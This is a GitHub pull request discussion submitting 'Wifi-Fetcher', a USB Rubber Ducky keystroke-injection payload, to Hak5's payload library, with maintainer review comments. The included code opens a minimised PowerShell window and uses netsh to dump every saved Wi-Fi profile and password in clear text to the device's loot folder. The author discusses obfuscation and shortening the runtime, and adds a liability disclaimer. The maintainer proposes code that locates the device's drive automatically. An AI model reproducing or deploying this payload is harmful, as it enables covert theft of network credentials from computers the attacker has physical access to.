-
Notifications
You must be signed in to change notification settings - Fork 1.4k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Wifi-Fetcher Payload #425
base: master
Are you sure you want to change the base?
Wifi-Fetcher Payload #425
Conversation
Adding a payload to the Hak5 liberary
After uploading the payload for approval i just now saw that the winner of the recent Payload-awards has a script that serves almost the same functionallity as mine, only that mine has 0 Dependencies for the target since i used integrated system components and the outputfile is stored locally, which doesnt even require an internet connection, you also wont need a dropbox Token, if you create the directory in your ducky, its basically Plug 'n Play. Just dont have too much fun ; ) |
Shortened Overall Runtime
obfuscation by making the cmd less readable
fixed error with Delays . Removed the obfuscation because it was affecting the executiontime too much. also made the script run in only 22 seconds, which means we cut around 15 seconds from the initial script
your disclaimer regarding the required directory needs to go into the payload.txt, otherwise no one will ever see it after this is merged. you should also use DEFINE for this so it is easily changeable |
Added DISCLAIMER and INSTRUCTIONS
used DEFINE in the Script for easy adaptabillity
Please dont publish it yet as i will have to Test it beforehand,i will make some Last changes in the next 24 hours, then it can BE published to the repo
It IS ready, you can go ahead and put it in the repo |
REM credits:ChatGPT helped a little here and there while debugging | ||
REM DEPENDENCIES: NONE | ||
REM TOTAL_EXEC_TIME: 18.5 seconds (may vary based of taged specifications) | ||
DEFINE DISC "the end User of the Script IS the only Person Held responsible for the harm or leak of information caused by the payload, Neither the creator of the Script nor the Distribute(Hak5 LLC.) shall BE Held responsible for any damages caused." |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I would change this to be a REM
Rather than a DEFINE
REM TOTAL_EXEC_TIME: 18.5 seconds (may vary based of taged specifications) | ||
DEFINE DISC "the end User of the Script IS the only Person Held responsible for the harm or leak of information caused by the payload, Neither the creator of the Script nor the Distribute(Hak5 LLC.) shall BE Held responsible for any damages caused." | ||
REM | ||
DEFINE INSTR "IF YOU DON'T HAVE THE DIRECTORY D:\loot\PwnedWIFI\ ON THE DUCKY, THIS SCRIPT WILL NOT WORK. EITHER CREATE THE DIRECTORY OR MODIFY THE PAYLOAD TO STORE THE OUTPUT FILE ELSEWHERE" |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I would change this to be a REM
Rather than a DEFINE
DELAY 220 | ||
STRINGLN color FE | ||
DELAY 50 | ||
STRINGLN start /MIN powershell "netsh wlan show profiles | Select-String 'All User Profile\s*:\s*(.+)' | ForEach-Object { $_ -match 'All User Profile\s*:\s*(.+)'; $matches[1] } | ForEach-Object { netsh wlan show profile name=$_ key=clear } | Out-File -FilePath 'D:\loot\PwnedWIFI\all_wifi_info.txt'; netsh wlan export profile key=clear | Out-File -Append -FilePath 'D:\loot\PwnedWIFI\all_wifi_passwords.txt';" & exit |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
A better approach for this is to use dynamic code that locates the Duckys drive location. You can use PowerShell in order to locate the drive name DUCKY
which is the default drive name.
for example:
Get-Volume | Where-Object { $_.FileSystemLabel -eq 'DUCKY' } | Select-Object -ExpandProperty DriveLetter
This dynamically located the drive letter for the ducky. Keep in mind that not everyone will be using the default label of DUCKY
it is recommended you add a DEFINE
for the label : DEFINE #DUCKY_DRIVE_LABEL DUCKY
this allows the user to easily configure the payload for their specific configuration.
DEFINE #DUCKY_DRIVE_LABEL DUCKY
STRINGLN Get-Volume | Where-Object { $_.FileSystemLabel -eq '#DUCKY_DRIVE_LABEL' } | Select-Object -ExpandProperty DriveLetter
@@ -0,0 +1,28 @@ | |||
REM NAME: Wifi-Fetcher |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
You have placed your payload in the wrong directory. Please ensure that your payloads are uploaded to the correct directory: payloads/library/exfiltration/Wifi-Fetcher/payload.txt
A Paylaod that will exfiltrate all the wifi information that has been saved on the computer and pull it to the D:\loot\PwnedWIFI\all_wifi_info.txt file in your usb rubber ducky, if the file is not in that directory it will create it.
IF YOU DONT HAVE THE DIRECTORY D:\loot\PwnedWIFI\ On THE DUCKY, THIS SCRIPT WILL NOT WORK, EITHER CREATE THE DIRECTORY OR MODIFY THE PAYLOAD TO STORE THE OUTPUT FILE ELSEWHERE